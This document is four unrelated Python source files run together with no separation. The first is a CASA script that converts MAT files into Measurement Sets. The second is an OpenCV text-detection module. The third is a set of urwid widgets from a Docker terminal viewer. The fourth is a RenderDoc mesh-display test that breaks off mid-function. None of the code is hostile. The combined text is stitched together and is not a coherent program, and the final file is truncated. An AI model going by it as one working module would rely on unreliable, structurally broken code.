#!/usr/bin/env python # Run using: # casapy --nologger --nogui --log2term -c mat_to_ms <MAT name> <input MS template> <output MS name> import os import sys import scipy import scipy.io import collections import numpy as np # http://stackoverflow.com/questions/7008608/scipy-io-loadmat-nested-structures-i-e-dictionaries def loadmat(filename): ''' this function should be called instead of direct scipy.io.loadmat as it cures the problem of not properly recovering python dictionaries from mat files. It calls the function check keys to cure all entries which are still mat-objects ''' data = scipy.io.loadmat(filename, struct_as_record=False, squeeze_me=False) return _check_keys(data) def _check_keys(dict): ''' checks if entries in dictionary are mat-objects. If yes todict is called to change them to nested dictionaries ''' for key in dict: if isinstance(dict[key], np.ndarray): for i in dict[key]: if isinstance(i[0], scipy.io.matlab.mio5_params.mat_struct): dict[key] = _todict(i[0]) return dict def _todict(matobj): ''' A recursive function which constructs from matobjects nested dictionaries ''' dict = collections.OrderedDict() for strg in matobj._fieldnames: elem = matobj.__dict__[strg] #print strg, type(elem), elem.shape if isinstance(elem, np.ndarray) and elem.size > 0: if isinstance(elem[0][0], scipy.io.matlab.mio5_params.mat_struct): dict[strg] = _todict(elem[0][0]) else: dict[strg] = elem elif isinstance(elem, scipy.io.matlab.mio5_params.mat_struct): dict[strg] = _todict(elem) else: dict[strg] = elem return dict def add_model_data(): # Add the model data column and initialise to zero. model_desc = { 'MODEL_DATA': { 'comment': 'model data', 'dataManagerGroup': 'ModelTiled', 'dataManagerType': 'TiledShapeStMan', 'maxlen': 0, 'ndim': 2, 'option': 0, 'valueType': 'complex' } } model_dminfo = { '*6': { 'COLUMNS': np.array(['MODEL_DATA'], dtype='|S11'), 'NAME': 'ModelTiled', 'SEQNR': 5, 'SPEC': { 'ActualMaxCacheSize': 0, 'DEFAULTTILESHAPE': np.array([1, 1, 64262], dtype=np.int32), 'HYPERCUBES': { '*1': { 'BucketSize': 514096, 'CellShape': np.array([1, 1], dtype=np.int32), 'CubeShape': np.array([1, 1, 1606550], dtype=np.int32), 'ID': {}, 'TileShape': np.array([1, 1, 64262], dtype=np.int32) } }, 'IndexSize': 1, 'MAXIMUMCACHESIZE': 0, 'SEQNR': 5 }, 'TYPE': 'TiledShapeStMan' } } tb.addcols(model_desc, model_dminfo) tb.putcol('MODEL_DATA', np.zeros((1, 1, tb.nrows()), dtype='c16')) def add_corrected_data(): # Add the corrected data column and initialise to zero. 
cor_desc = { 'CORRECTED_DATA': { 'comment': 'corrected data', 'dataManagerGroup': 'CorrectedTiled', 'dataManagerType': 'TiledShapeStMan', 'maxlen': 0, 'ndim': 2, 'option': 0, 'valueType': 'complex' } } cor_dminfo = { '*7': { 'COLUMNS': np.array(['CORRECTED_DATA'], dtype='|S15'), 'NAME': 'CorrectedTiled', 'SEQNR': 6, 'SPEC': { 'ActualMaxCacheSize': 0, 'DEFAULTTILESHAPE': np.array([1, 1, 64262], dtype=np.int32), 'HYPERCUBES': { '*1': { 'BucketSize': 514096, 'CellShape': np.array([1, 1], dtype=np.int32), 'CubeShape': np.array([1, 1, 1606550], dtype=np.int32), 'ID': {}, 'TileShape': np.array([1, 1, 64262], dtype=np.int32) } }, 'IndexSize': 1, 'MAXIMUMCACHESIZE': 0, 'SEQNR': 6 }, 'TYPE': 'TiledShapeStMan' } } tb.addcols(cor_desc, cor_dminfo) tb.putcol('CORRECTED_DATA', np.zeros((1, 1, tb.nrows()), dtype='c16')) def copy_ms(ms_in, ms_out): """Make a copy of a MS without copying any rows of the main table.""" tb.open(ms_in, nomodify=True) tbcopy = tb.copy(ms_out, deep=True, valuecopy=True, norows=True, returnobject=False) if tbcopy: tbcopy.close() # Copy all subtables intact. sub_tables = tb.getkeywords() tb.close() for s in sorted(sub_tables): if str(sub_tables[s]).startswith('Table'): if s == 'SORTED_TABLE': continue print 'Copying', ms_in + '/' + s, 'to', ms_out + '/' + s tb.open(ms_in + '/' + s) tbcopy = tb.copy(ms_out + '/' + s, deep=True, valuecopy=True, norows=False, returnobject=False) if tbcopy: tbcopy.close() tb.close() if __name__ == '__main__': # Get MAT file name and MS names from command line. mat_name = sys.argv[-3] template_name = sys.argv[-2] ms_name = sys.argv[-1] # Load the MAT file into a dictionary. d = loadmat(mat_name) # Copy the input (template) MS to a new one. copy_ms(template_name, ms_name) # Open the output MS. print "Opening table", ms_name tb.open(ms_name, nomodify=False) # Check if corrected data or model data columns should be added. if 'CORRECTED_DATA' in d and not 'CORRECTED_DATA' in tb.colnames(): print "Adding corrected data" add_corrected_data() if 'MODEL_DATA' in d and not 'MODEL_DATA' in tb.colnames(): print "Adding model data" add_model_data() # Iterate the dictionary (all the columns). found_length = 0 for k in d: # Check if column exists in the main table. if k in tb.colnames(): req_length = d[k].shape[-1] if found_length == 0: if req_length == 0: continue print "Adding rows", req_length tb.addrows(req_length) found_length = 1 elif req_length > 0 and req_length != tb.nrows(): raise RuntimeError("Inconsistent row dimension!") if req_length > 0: print "Putting column", k, type(d[k]), d[k].shape, d[k].dtype tb.putcol(k, d[k]) print "Closing table" tb.close()
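# A minimal sketch (illustrative, to be run in plain Python rather than under
# casapy) of producing an input MAT file for this script with scipy: each
# variable name must match a column of the MS main table, and the last array
# dimension is the number of rows to write. The column names, shapes and row
# count below are assumptions for the example (the row count mirrors the
# CubeShape used in the data-manager info above).
def write_example_mat(filename='example_vis.mat', num_rows=1606550):
    example = {
        'DATA': np.zeros((1, 1, num_rows), dtype='c16'),  # 1 pol x 1 chan x rows
        'UVW': np.zeros((3, num_rows)),
    }
    scipy.io.savemat(filename, example)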
# -*- coding: utf-8 -*- """ Detect words on the page return array of words' bounding boxes """ import numpy as np import matplotlib.pyplot as plt import cv2 from .helpers import * def detection(image, join=False): """Detecting the words bounding boxes. Return: numpy array of bounding boxes [x, y, x+w, y+h] """ # Preprocess image for word detection blurred = cv2.GaussianBlur(image, (5, 5), 18) edge_img = _edge_detect(blurred) ret, edge_img = cv2.threshold(edge_img, 50, 255, cv2.THRESH_BINARY) bw_img = cv2.morphologyEx(edge_img, cv2.MORPH_CLOSE, np.ones((15,15), np.uint8)) return _text_detect(bw_img, image, join) def sort_words(boxes): """Sort boxes - (x, y, x+w, y+h) from left to right, top to bottom.""" mean_height = sum([y2 - y1 for _, y1, _, y2 in boxes]) / len(boxes) boxes.view('i8,i8,i8,i8').sort(order=['f1'], axis=0) current_line = boxes[0][1] lines = [] tmp_line = [] for box in boxes: if box[1] > current_line + mean_height: lines.append(tmp_line) tmp_line = [box] current_line = box[1] continue tmp_line.append(box) lines.append(tmp_line) for line in lines: line.sort(key=lambda box: box[0]) return lines def _edge_detect(im): """ Edge detection using sobel operator on each layer individually. Sobel operator is applied for each image layer (RGB) """ return np.max(np.array([_sobel_detect(im[:,:, 0]), _sobel_detect(im[:,:, 1]), _sobel_detect(im[:,:, 2])]), axis=0) def _sobel_detect(channel): """Sobel operator.""" sobelX = cv2.Sobel(channel, cv2.CV_16S, 1, 0) sobelY = cv2.Sobel(channel, cv2.CV_16S, 0, 1) sobel = np.hypot(sobelX, sobelY) sobel[sobel > 255] = 255 return np.uint8(sobel) def union(a,b): x = min(a[0], b[0]) y = min(a[1], b[1]) w = max(a[0]+a[2], b[0]+b[2]) - x h = max(a[1]+a[3], b[1]+b[3]) - y return [x, y, w, h] def _intersect(a,b): x = max(a[0], b[0]) y = max(a[1], b[1]) w = min(a[0]+a[2], b[0]+b[2]) - x h = min(a[1]+a[3], b[1]+b[3]) - y if w<0 or h<0: return False return True def _group_rectangles(rec): """ Uion intersecting rectangles. 
Args: rec - list of rectangles in form [x, y, w, h] Return: list of grouped ractangles """ tested = [False for i in range(len(rec))] final = [] i = 0 while i < len(rec): if not tested[i]: j = i+1 while j < len(rec): if not tested[j] and _intersect(rec[i], rec[j]): rec[i] = union(rec[i], rec[j]) tested[j] = True j = i j += 1 final += [rec[i]] i += 1 return final def _text_detect(img, image, join=False): """Text detection using contours.""" small = resize(img, 2000) # Finding contours mask = np.zeros(small.shape, np.uint8) cnt, hierarchy = cv2.findContours(np.copy(small), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE) index = 0 boxes = [] # Go through all contours in top level while (index >= 0): x,y,w,h = cv2.boundingRect(cnt[index]) cv2.drawContours(mask, cnt, index, (255, 255, 255), cv2.FILLED) maskROI = mask[y:y+h, x:x+w] # Ratio of white pixels to area of bounding rectangle r = cv2.countNonZero(maskROI) / (w * h) # Limits for text if (r > 0.1 and 1600 > w > 10 and 1600 > h > 10 and h/w < 3 and w/h < 10 and (60 // h) * w < 1000): boxes += [[x, y, w, h]] index = hierarchy[0][index][0] if join: # Need more work boxes = _group_rectangles(boxes) # image for drawing bounding boxes small = cv2.cvtColor(small, cv2.COLOR_GRAY2RGB) bounding_boxes = np.array([0,0,0,0]) for (x, y, w, h) in boxes: cv2.rectangle(small, (x, y),(x+w,y+h), (0, 255, 0), 2) bounding_boxes = np.vstack((bounding_boxes, np.array([x, y, x+w, y+h]))) implt(small, t='Bounding rectangles') boxes = bounding_boxes.dot(ratio(image, small.shape[0])).astype(np.int64) return boxes[1:] def textDetectWatershed(thresh): """NOT IN USE - Text detection using watershed algorithm. Based on: http://docs.opencv.org/trunk/d3/db4/tutorial_py_watershed.html """ img = cv2.cvtColor(cv2.imread("data/textdet/%s.jpg" % IMG), cv2.COLOR_BGR2RGB) img = resize(img, 3000) thresh = resize(thresh, 3000) # noise removal kernel = np.ones((3,3),np.uint8) opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 3) # sure background area sure_bg = cv2.dilate(opening,kernel,iterations=3) # Finding sure foreground area dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5) ret, sure_fg = cv2.threshold(dist_transform, 0.01*dist_transform.max(), 255, 0) # Finding unknown region sure_fg = np.uint8(sure_fg) unknown = cv2.subtract(sure_bg,sure_fg) # Marker labelling ret, markers = cv2.connectedComponents(sure_fg) # Add one to all labels so that sure background is not 0, but 1 markers += 1 # Now, mark the region of unknown with zero markers[unknown == 255] = 0 markers = cv2.watershed(img, markers) implt(markers, t='Markers') image = img.copy() gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) for mark in np.unique(markers): # mark == 0 --> background if mark == 0: continue # Draw it on mask and detect biggest contour mask = np.zeros(gray.shape, dtype="uint8") mask[markers == mark] = 255 cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] c = max(cnts, key=cv2.contourArea) # Draw a bounding rectangle if it contains text x,y,w,h = cv2.boundingRect(c) cv2.drawContours(mask, c, 0, (255, 255, 255), cv2.FILLED) maskROI = mask[y:y+h, x:x+w] # Ratio of white pixels to area of bounding rectangle r = cv2.countNonZero(maskROI) / (w * h) # Limits for text if r > 0.2 and 2000 > w > 15 and 1500 > h > 15: cv2.rectangle(image, (x, y),(x+w,y+h), (0, 255, 0), 2) implt(image)
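# A minimal usage sketch (illustrative): run the detector on an RGB image and
# order the resulting boxes into text lines. The input path is hypothetical.
def example_detect(path='data/page01.jpg'):
    image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    boxes = detection(image, join=False)  # Nx4 int array: [x1, y1, x2, y2]
    lines = sort_words(boxes)             # list of lines, each left-to-right
    return lines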
""" Info widgets: * display detailed info about an object """ import logging import pprint import threading import urwid import urwidtrees from sen.tui.widgets.list.base import WidgetBase from urwid.decoration import BoxAdapter from sen.tui.chunks.elemental import LayerWidget, ContainerStatusWidget, ContainerOneLinerWidget from sen.tui.widgets.graph import ContainerInfoGraph from sen.tui.widgets.list.util import get_map, RowWidget, UnselectableRowWidget from sen.tui.widgets.table import assemble_rows from sen.tui.widgets.util import SelectableText, ColorText, UnselectableListBox from sen.util import humanize_bytes, log_traceback logger = logging.getLogger(__name__) class TagWidget(SelectableText): """ so we can easily access image and tag """ def __init__(self, docker_image, tag): self.docker_image = docker_image self.tag = tag super().__init__(str(self.tag)) class ImageInfoWidget(WidgetBase): """ display info about image """ def __init__(self, ui, docker_image): self.walker = urwid.SimpleFocusListWalker([]) super().__init__(ui, self.walker) self.docker_image = docker_image # self.widgets = [] self.refresh() self.set_focus(0) # or assemble list first and then stuff it into walker def refresh(self): # TODO: refresh when something changes self._basic_data() self._containers() self._image_names() self._layers() self._labels() @property def focused_docker_object(self): # TODO: enable removing image names try: return self.focus.columns.widget_list[0].docker_container except AttributeError: try: return self.focus.columns.widget_list[0].docker_image except AttributeError: return None def _basic_data(self): data = [ [SelectableText("Id", maps=get_map("main_list_green")), SelectableText(self.docker_image.image_id)], [SelectableText("Created", maps=get_map("main_list_green")), SelectableText("{0}, {1}".format(self.docker_image.display_formal_time_created(), self.docker_image.display_time_created()))], [SelectableText("Size", maps=get_map("main_list_green")), SelectableText(humanize_bytes(self.docker_image.size))], [SelectableText("Command", maps=get_map("main_list_green")), SelectableText(self.docker_image.container_command)], ] self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _image_names(self): if not self.docker_image.names: return self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Image Names", maps=get_map("main_list_white"))])) for n in self.docker_image.names: self.walker.append(RowWidget([TagWidget(self.docker_image, n)])) def _layers(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Layers", maps=get_map("main_list_white"))])) i = self.docker_image index = 0 self.walker.append(RowWidget([LayerWidget(self.ui, self.docker_image, index=index)])) while True: index += 1 parent = i.parent_image if parent: self.walker.append(RowWidget([LayerWidget(self.ui, parent, index=index)])) i = parent else: break def _labels(self): if not self.docker_image.labels: return [] data = [] self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Labels", maps=get_map("main_list_white"))])) for label_key, label_value in self.docker_image.labels.items(): data.append([SelectableText(label_key, maps=get_map("main_list_green")), SelectableText(label_value)]) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _containers(self): if not self.docker_image.containers(): return self.walker.append(RowWidget([SelectableText("")])) 
self.walker.append(RowWidget([SelectableText("Containers", maps=get_map("main_list_white"))])) for container in self.docker_image.containers(): self.walker.append(RowWidget([ContainerOneLinerWidget(self.ui, container)])) class Process: """ single process returned for container.stats() query so we can hash the object """ def __init__(self, data): self.data = data @property def pid(self): return self.data["PID"] @property def ppid(self): return self.data["PPID"] @property def command(self): return self.data["COMMAND"] def __str__(self): return "[{}] {}".format(self.pid, self.command) def __repr__(self): return self.__str__() class ProcessList: """ util functions for process returned by container.stats() """ def __init__(self, data): self.data = [Process(x) for x in data] self._nesting = {x.pid: [] for x in self.data} for x in self.data: try: self._nesting[x.ppid].append(x) except KeyError: pass logger.debug(pprint.pformat(self._nesting, indent=2)) self._pids = [x.pid for x in self.data] self._pid_index = {x.pid: x for x in self.data} def get_parent_process(self, process): return self._pid_index.get(process.ppid, None) def get_root_process(self): # FIXME: error handling root_process = [x for x in self.data if x.ppid not in self._pids] return root_process[0] def get_first_child_process(self, process): try: return self._nesting[process.pid][0] except (KeyError, IndexError): return def get_last_child_process(self, process): try: return self._nesting[process.pid][-1] except (KeyError, IndexError): return def get_next_sibling(self, process): children = self._nesting.get(process.ppid, []) if len(children) <= 0: return None try: p = children[children.index(process) + 1] except IndexError: return return p def get_prev_sibling(self, process): children = self._nesting.get(process.ppid, []) if len(children) <= 0: return None logger.debug("prev of %s has children %s", process, children) prev_idx = children.index(process) - 1 if prev_idx < 0: # when this code path is not present, tree navigation is seriously messed up return None else: return children[prev_idx] class ProcessTreeBackend(urwidtrees.Tree): def __init__(self, data): """ :param data: dict, response from container.top() """ super().__init__() self.data = data self.process_list = ProcessList(data) self.root = self.process_list.get_root_process() def __getitem__(self, pos): logger.debug("do widget for %s", pos) return RowWidget([SelectableText(str(pos))]) # Tree API def parent_position(self, pos): v = self.process_list.get_parent_process(pos) logger.debug("parent of %s is %s", pos, v) return v def first_child_position(self, pos): logger.debug("first child process for %s", pos) v = self.process_list.get_first_child_process(pos) logger.debug("first child of %s is %s", pos, v) return v def last_child_position(self, pos): v = self.process_list.get_last_child_process(pos) logger.debug("last child of %s is %s", pos, v) return v def next_sibling_position(self, pos): v = self.process_list.get_next_sibling(pos) logger.debug("next of %s is %s", pos, v) return v def prev_sibling_position(self, pos): v = self.process_list.get_prev_sibling(pos) logger.debug("prev of %s is %s", pos, v) return v class ProcessTree(urwidtrees.TreeBox): def __init__(self, data): tree = ProcessTreeBackend(data) # We hide the usual arrow tip and use a customized collapse-icon. 
t = urwidtrees.ArrowTree( tree, arrow_att="tree", # lines, tip icon_collapsed_att="tree", # + icon_expanded_att="tree", # - icon_frame_att="tree", # [ ] ) super().__init__(t) class ContainerInfoWidget(WidgetBase): """ display info about container """ def __init__(self, ui, docker_container): self.walker = urwid.SimpleFocusListWalker([]) super().__init__(ui, self.walker) self.docker_container = docker_container self.stop = threading.Event() self.refresh() self.set_focus(0) # or assemble list first and then stuff it into walker def refresh(self): self._basic_data() self._net() self._image() self._process_tree() self._resources() self._labels() self._logs() @property def focused_docker_object(self): try: return self.focus.columns.widget_list[0].docker_image except AttributeError: return None def _basic_data(self): data = [ [SelectableText("Id", maps=get_map("main_list_green")), SelectableText(self.docker_container.container_id)], [SelectableText("Status", maps=get_map("main_list_green")), ContainerStatusWidget(self.docker_container)], [SelectableText("Created", maps=get_map("main_list_green")), SelectableText("{0}, {1}".format(self.docker_container.display_formal_time_created(), self.docker_container.display_time_created()))], [SelectableText("Command", maps=get_map("main_list_green")), SelectableText(self.docker_container.command)], ] if self.docker_container.names: data.append( [SelectableText("Name", maps=get_map("main_list_green")), SelectableText("".join(self.docker_container.names))], ) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _net(self): ports = self.docker_container.net.ports data = [] if ports: data.extend([[SelectableText("")], [ SelectableText("Host Port", maps=get_map("main_list_white")), SelectableText("Container Port", maps=get_map("main_list_white")) ]]) for container_port, host_port in ports.items(): if host_port and container_port: data.append([ SelectableText(host_port), SelectableText(container_port) ]) ips = self.docker_container.net.ips logger.debug(ips) if ips: data.extend([[SelectableText("")], [ SelectableText("Network Name", maps=get_map("main_list_white")), SelectableText("IP Address", maps=get_map("main_list_white")) ]]) for net_name, net_data in ips.items(): a4 = net_data.get("ip_address4", "none") a6 = net_data.get("ip_address6", "") data.append([ SelectableText(net_name), SelectableText(a4) ]) if a6: data.append([ SelectableText(net_name), SelectableText(a6) ]) if data: self.walker.extend(assemble_rows(data, dividechars=3, ignore_columns=[1])) def _image(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Image", maps=get_map("main_list_white"))])) self.walker.append(RowWidget([LayerWidget(self.ui, self.docker_container.image)])) def _resources(self): self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Resource Usage", maps=get_map("main_list_white"))])) cpu_g = ContainerInfoGraph("graph_lines_cpu_tips", "graph_lines_cpu") mem_g = ContainerInfoGraph("graph_lines_mem_tips", "graph_lines_mem") blk_r_g = ContainerInfoGraph("graph_lines_blkio_r_tips", "graph_lines_blkio_r") blk_w_g = ContainerInfoGraph("graph_lines_blkio_w_tips", "graph_lines_blkio_w") net_r_g = ContainerInfoGraph("graph_lines_net_r_tips", "graph_lines_net_r") net_w_g = ContainerInfoGraph("graph_lines_net_w_tips", "graph_lines_net_w") cpu_label = ColorText("CPU ", "graph_lines_cpu_legend") cpu_value = ColorText("0.0 %", "graph_lines_cpu_legend") mem_label = ColorText("Memory ", 
"graph_lines_mem_legend") mem_value = ColorText("0.0 %", "graph_lines_mem_legend") blk_r_label = ColorText("I/O Read ", "graph_lines_blkio_r_legend") blk_r_value = ColorText("0 B", "graph_lines_blkio_r_legend") blk_w_label = ColorText("I/O Write ", "graph_lines_blkio_w_legend") blk_w_value = ColorText("0 B", "graph_lines_blkio_w_legend") net_r_label = ColorText("Net Rx ", "graph_lines_net_r_legend") net_r_value = ColorText("0 B", "graph_lines_net_r_legend") net_w_label = ColorText("Net Tx ", "graph_lines_net_w_legend") net_w_value = ColorText("0 B", "graph_lines_net_w_legend") self.walker.append(urwid.Columns([ BoxAdapter(cpu_g, 12), BoxAdapter(mem_g, 12), ("weight", 0.5, BoxAdapter(blk_r_g, 12)), ("weight", 0.5, BoxAdapter(blk_w_g, 12)), ("weight", 0.5, BoxAdapter(net_r_g, 12)), ("weight", 0.5, BoxAdapter(net_w_g, 12)), BoxAdapter(UnselectableListBox(urwid.SimpleFocusListWalker([ UnselectableRowWidget([(12, cpu_label), cpu_value]), UnselectableRowWidget([(12, mem_label), mem_value]), UnselectableRowWidget([(12, blk_r_label), blk_r_value]), UnselectableRowWidget([(12, blk_w_label), blk_w_value]), UnselectableRowWidget([(12, net_r_label), net_r_value]), UnselectableRowWidget([(12, net_w_label), net_w_value]), ])), 12), ])) self.walker.append(RowWidget([SelectableText("")])) @log_traceback def realtime_updates(): for update in self.docker_container.stats().response: if self.stop.is_set(): break logger.debug(update) cpu_percent = update["cpu_percent"] cpu_value.text = "%.2f %%" % cpu_percent cpu_g.rotate_value(int(cpu_percent), max_val=100) mem_percent = update["mem_percent"] mem_current = humanize_bytes(update["mem_current"]) mem_value.text = "%.2f %% (%s)" % (mem_percent, mem_current) mem_g.rotate_value(int(mem_percent), max_val=100) blk_read = update["blk_read"] blk_write = update["blk_write"] blk_r_value.text = humanize_bytes(blk_read) blk_w_value.text = humanize_bytes(blk_write) r_max_val = blk_r_g.rotate_value(blk_read, adaptive_max=True) w_max_val = blk_w_g.rotate_value(blk_write, adaptive_max=True) blk_r_g.set_max(max((r_max_val, w_max_val))) blk_w_g.set_max(max((r_max_val, w_max_val))) net_read = update["net_rx"] net_write = update["net_tx"] net_r_value.text = humanize_bytes(net_read) net_w_value.text = humanize_bytes(net_write) r_max_val = net_r_g.rotate_value(net_read, adaptive_max=True) w_max_val = net_w_g.rotate_value(net_write, adaptive_max=True) net_r_g.set_max(max((r_max_val, w_max_val))) net_w_g.set_max(max((r_max_val, w_max_val))) self.thread = threading.Thread(target=realtime_updates, daemon=True) self.thread.start() def _labels(self): if not self.docker_container.labels: return [] data = [] self.walker.append(RowWidget([SelectableText("Labels", maps=get_map("main_list_white"))])) for label_key, label_value in self.docker_container.labels.items(): data.append([SelectableText(label_key, maps=get_map("main_list_green")), SelectableText(label_value)]) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _process_tree(self): top = self.docker_container.top().response logger.debug(top) if top: self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Process Tree", maps=get_map("main_list_white"))])) self.walker.append(BoxAdapter(ProcessTree(top), len(top))) def _logs(self): operation = self.docker_container.logs(follow=False, lines=10) if operation.response: self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Logs", maps=get_map("main_list_white"))])) for x in 
operation.response.splitlines():
                self.walker.append(RowWidget([SelectableText(x)]))

    def destroy(self):
        self.stop.set()
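# Illustrative sketch (not part of the widgets above): ProcessList consumes rows shaped
# like `docker top` output -- dicts with at least PID/PPID/COMMAND keys -- and resolves
# them into a parent/child nesting that ProcessTree can walk. The sample data and the
# function below are made up purely for demonstration; the function is never called.
def _process_list_example():
    sample_top = [
        {"PID": "1", "PPID": "0", "COMMAND": "nginx: master process"},
        {"PID": "7", "PPID": "1", "COMMAND": "nginx: worker process"},
        {"PID": "8", "PPID": "1", "COMMAND": "nginx: worker process"},
    ]
    processes = ProcessList(sample_top)
    root = processes.get_root_process()              # [1] nginx: master process
    child = processes.get_first_child_process(root)  # [7] nginx: worker process
    sibling = processes.get_next_sibling(child)      # [8] nginx: worker process
    return root, child, sibling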
import renderdoc as rd import rdtest # Not a real test, re-used by API-specific tests class Mesh_Zoo(): def __init__(self): self.out = None self.cfg = rd.MeshDisplay() def cache_output(self): self.out.SetMeshDisplay(self.cfg) self.out.Display() pixels: bytes = self.out.ReadbackOutputTexture() dim = self.out.GetDimensions() pitch = dim[0]*3 self.rows = [pixels[row_start:row_start + pitch] for row_start in range(0, dim[1] * pitch, pitch)] rdtest.png_save(rdtest.get_tmp_path('output.png'), self.rows, dim, False) def find_action(self, name): action = None for d in self.controller.GetRootActions(): if name in d.customName: action = d break if action is None: raise rdtest.TestFailureException("Couldn't find '{}' action".format(name)) return action # To avoid needing to do image comparisons, we instead do quad region probes to see which colours are present. That # way we can programmatically check that the wireframe we expect to be there, is there def get_region_cols(self, region): x0, y0, x1, y1 = region cols = [] for y in range(y0, y1+1): for x in range(x0, x1+1): col = tuple(self.rows[y][x*3:x*3+3]) # skip pure gray, this comes from the checkerboard or frustum, all our lines and data are coloured if col[0] == col[1] and col[1] == col[2]: continue if col not in cols: cols.append(col) return cols def check_region(self, region, test): colors = self.get_region_cols(region) if not test(colors): tmp_path = rdtest.get_tmp_path('output.png') rdtest.png_save(tmp_path, self.rows, self.out.GetDimensions(), False) raise rdtest.TestFailureException("Expected line segment wrong, colors: {}".format(colors), tmp_path) def check_vertex(self, x, y, result): pick = self.out.PickVertex(x, y) if not rdtest.value_compare(result, pick): raise rdtest.TestFailureException("When picking ({},{}) expected vertex {} in instance {}, but found {} in {}".format(x, y, result[0], result[1], pick[0], pick[1])) rdtest.log.success("Picking {},{} returns vertex {} in instance {} as expected".format(x, y, result[0], result[1])) def check_capture(self, capture_filename: str, controller: rd.ReplayController): self.controller = controller self.controller.SetFrameEvent(self.find_action("Quad").next.eventId, False) self.out: rd.ReplayOutput = self.controller.CreateOutput(rd.CreateHeadlessWindowingData(200, 200), rd.ReplayOutputType.Mesh) pipe: rd.PipeState = self.controller.GetPipelineState() self.cfg = rd.MeshDisplay() cam: rd.Camera = rd.InitCamera(rd.CameraType.FPSLook) cam.SetPosition(0, 0, 0) cam.SetFPSRotation(0, 0, 0) self.cfg.type = rd.MeshDataStage.VSOut self.cfg.cam = cam # Position is always first, so getting the postvs data will give us inst0: rd.MeshFormat = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position = inst0 # after position we have float2 Color2 then float4 Color4 self.cfg.second = self.cfg.position self.cfg.second.vertexByteOffset += 16 self.cfg.second.vertexByteOffset += 8 if pipe.HasAlignedPostVSData(self.cfg.type): self.cfg.second.vertexByteOffset += 8 # Configure an ortho camera, even though we don't really have a camera self.cfg.ortho = True self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cfg.aspect = 1.0 self.cfg.wireframeDraw = True self.cfg.position.meshColor = rd.FloatVector(1.0, 0.0, 1.0, 1.0) self.cache_output() # We should have a single quad, check each outside edge and the inside diagonal. 
# All these line segments should have some colors (not including the background checkerboard or the frustum) self.check_region((55, 95, 65, 95), lambda x: x != []) # Left edge self.check_region((85, 60, 85, 70), lambda x: x != []) # Top edge self.check_region((105, 100, 115, 100), lambda x: x != []) # Right edge self.check_region((90, 130, 90, 140), lambda x: x != []) # Bottom edge self.check_region((65, 120, 75, 120), lambda x: x != []) # Bottom-Left of diagonal self.check_region((105, 70, 110, 70), lambda x: x != []) # Top-right of diagonal rdtest.log.success("Base rendering is as expected") self.cfg.solidShadeMode = rd.SolidShade.Secondary self.cfg.wireframeDraw = False # allow for blending with white for the frustum isred = lambda col: col[0] > col[1] and col[1] == col[2] isgreen = lambda col: col[1] > col[0] and col[0] == col[2] isblue = lambda col: col[2] > col[0] and col[0] == col[1] isredgreen = lambda col: isred(col) or isgreen(col) or col[2] == 0 isyellow = lambda col: col[0] == col[1] and col[2] < col[1] self.cache_output() # The secondary color should be completely green self.check_region((85, 70, 85, 125), lambda x: all([isgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isgreen(i) for i in x])) # this line segment isn't in the first instance self.check_region((65, 55, 105, 55), lambda x: x == []) # this line segment isn't in the second instance self.check_region((65, 125, 105, 125), lambda x: all([isgreen(i) for i in x])) rdtest.log.success("Secondary rendering of instance 0 is as expected") # Out of bounds should look the same as without highlighting at all, check the corners are all still green self.cfg.highlightVert = 9 self.cache_output() self.check_region((55, 60, 65, 70), lambda x: all([isgreen(i) for i in x])) self.check_region((105, 60, 115, 70), lambda x: all([isgreen(i) for i in x])) self.check_region((55, 130, 65, 140), lambda x: all([isgreen(i) for i in x])) self.check_region((105, 130, 115, 140), lambda x: all([isgreen(i) for i in x])) vert_regions = [ (55, 60, 65, 70), (110, 60, 120, 70), (55, 130, 65, 140), (110, 60, 120, 70), (110, 130, 120, 140), (55, 130, 65, 140), ] for vert in range(6): self.cfg.highlightVert = vert self.cache_output() tri = int(vert / 3) # Check that the triangle we're highlighting is red and the other is green if tri == 0: self.check_region((65, 75, 75, 85), lambda x: all([isred(i) for i in x])) self.check_region((100, 115, 110, 125), lambda x: all([isgreen(i) for i in x])) else: self.check_region((65, 75, 75, 85), lambda x: all([isgreen(i) for i in x])) self.check_region((100, 115, 110, 125), lambda x: all([isred(i) for i in x])) # The corners that touch should be red and green - that is no other colours but red and green, but at least # some red and some green self.check_region((65, 115, 75, 125), lambda x: all([isredgreen(i) for i in x]) and any([isred(i) for i in x]) and any([isgreen(i) for i in x])) # check that there's blue in this vertex's region self.check_region(vert_regions[vert], lambda x: any([isblue(i) for i in x])) rdtest.log.success("Rendering of highlighted vertices is as expected") self.cfg.highlightVert = rd.MeshDisplay.NoHighlight # If we render from the float2 color we shouldn't get any blue self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst0.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.format.compCount = 2 self.cache_output() # If we render from the float2 color we shouldn't get any blue since it's only a two-component value 
